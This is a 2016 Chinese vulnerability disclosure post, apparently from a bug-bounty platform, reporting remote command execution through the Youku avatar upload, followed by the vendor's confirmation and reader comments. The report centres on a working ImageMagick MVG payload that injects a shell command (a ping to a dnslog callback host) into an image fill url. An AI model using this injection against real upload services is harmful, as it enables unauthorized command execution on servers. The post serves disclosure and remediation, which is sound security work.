优酷主站存在远程命令执行漏洞

#1 漏洞位置

个人头像上传

http://i.youku.com/u/setting/base_avatar.html

#2 payload

push graphic-context 
 viewbox 0 0 640 480 
 fill 'url(https://"|ping img.99fd5e.dnslog.info -c 1")'
 pop graphic-context

更新

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-05-05 18:25

厂商回复：

感谢猪猪侠报告！漏洞修复中！

最新状态：

暂无

1. 2016-05-05 17:51 | Drizzle.Risk ( 普通白帽子 | Rank:265 漏洞数:20 | 放下屠刀，立地成蛤)

   0

   也是？

   1# 回复此人

2. 2016-05-05 17:52 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

   0

   艹，我试的时候居然没试出来

   2# 回复此人

3. 2016-05-05 17:52 | Hackshy ( 实习白帽子 | Rank:88 漏洞数:30 | XXXXXXXXXXXX)

   0

   ......猪哥，

   3# 回复此人

4. 2016-05-05 17:53 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

   0

   。。。这节奏 都开始刷起来了么

   4# 回复此人

5. 2016-05-05 17:53 | JJ碎大石 ( 路人 | Rank:10 漏洞数:3 | ……白天抢银行，晚上做牛郎，至今买不起房...)

   0

   狂刷~~~~

   5# 回复此人

6. 2016-05-05 17:56 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

   0

   艹，我试的时候居然没试出来

   6# 回复此人

7. 2016-05-05 18:00 | sanwenkit ( 普通白帽子 | Rank:135 漏洞数:27 | 半吊子攻城师、开发狗)

   0

   orz

   7# 回复此人

8. 2016-05-05 18:02 | 默之 ( 普通白帽子 | Rank:1615 漏洞数:254 | 沉淀。)

   0

   wordpress?

   8# 回复此人

9. 2016-05-05 18:26 | Yuku ( 实习白帽子 | Rank:58 漏洞数:27 | 数据挖掘)

   0

   挖槽

   9# 回复此人

10. 2016-05-05 18:26 | niliu ( 核心白帽子 | Rank:1803 漏洞数:236 | 逆流而上)

    0

    艹，我试的时候居然没试出来

    10# 回复此人

11. 2016-05-05 18:34 | jackyu ( 路人 | Rank:28 漏洞数:18 | 世界上没有一个系统是绝对安全的，系统最大...)

    0

    有没有搞到优酷服务器

    11# 回复此人

12. 2016-05-05 18:41 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

    0

    @niliu 我没试出来情有可原，你咋回事

    12# 回复此人

13. 2016-05-05 18:57 | adminss ( 路人 | Rank:24 漏洞数:19 | ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇...)

    0

    这是要狂刷一波吗

    13# 回复此人

14. 2016-05-05 18:58 | 川zi ( 路人 | Rank:0 漏洞数:1 | A coder, hacker.focus on Linux, Android.)

    0

    大神啊。

    14# 回复此人

15. 2016-05-05 19:14 | 子非海绵宝宝 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    0

    难道是st2?

    15# 回复此人

16. 2016-05-05 19:15 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    0

    主站，我擦

    16# 回复此人

17. 2016-05-05 20:04 | Faith4444 ( 路人 | Rank:26 漏洞数:10 | 说出来可能你不信，我就是个垃圾)

    0

    主站，我擦

    17# 回复此人

18. 2016-05-05 20:31 | 淡蓝色の忧伤 ( 普通白帽子 | Rank:268 漏洞数:38 | 找个实习，有人要吗？(黑产勿扰))

    0

    ImageMagick ？

    18# 回复此人

19. 2016-05-05 21:09 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:490 漏洞数:133 | 乌云核心绿帽子 《绿帽子讲婚姻安全》作者)

    0

    ImageMagick？

    19# 回复此人

20. 2016-05-05 22:01 | vforbox ( 路人 | Rank:2 漏洞数:3 | 我这么努力, 就是为了实现梦想)

    0

    ImageMagick？

    20# 回复此人

21. 2016-05-05 22:13 | D＆G ( 普通白帽子 | Rank:780 漏洞数:158 | going)

    0

    没测出来啊

    21# 回复此人

22. 2016-05-05 23:49 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

    0

    66666

    22# 回复此人

23. 2016-05-06 04:37 | dr.m1st3r ( 实习白帽子 | Rank:54 漏洞数:10 | 一个爱泡妞的好骚年。)

    0

    是啊就是imagemagick都被玩坏了。。

    23# 回复此人

24. 2016-05-06 10:22 | waking-云狐 ( 实习白帽子 | Rank:34 漏洞数:5 | WAKINGTEAM 深圳智可网络科技有限公司)

    0

    ImageMagick？

    24# 回复此人

25. 2016-06-16 09:23 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效，坚持好的习惯千万不要放弃)

    0

    horrible!

    25# 回复此人

26. 2016-06-19 19:20 | Cicada3301绿帽子li ( 路人 | Rank:2 漏洞数:1 | 很酷。偶尔提交几个漏洞。就这样。QQ371920...)

    0

    IM绕过

    26# 回复此人

27. 2016-06-25 20:45 | Discover ( 实习白帽子 | Rank:37 漏洞数:15 )

    0

    艹，我试的时候居然没试出来

    27# 回复此人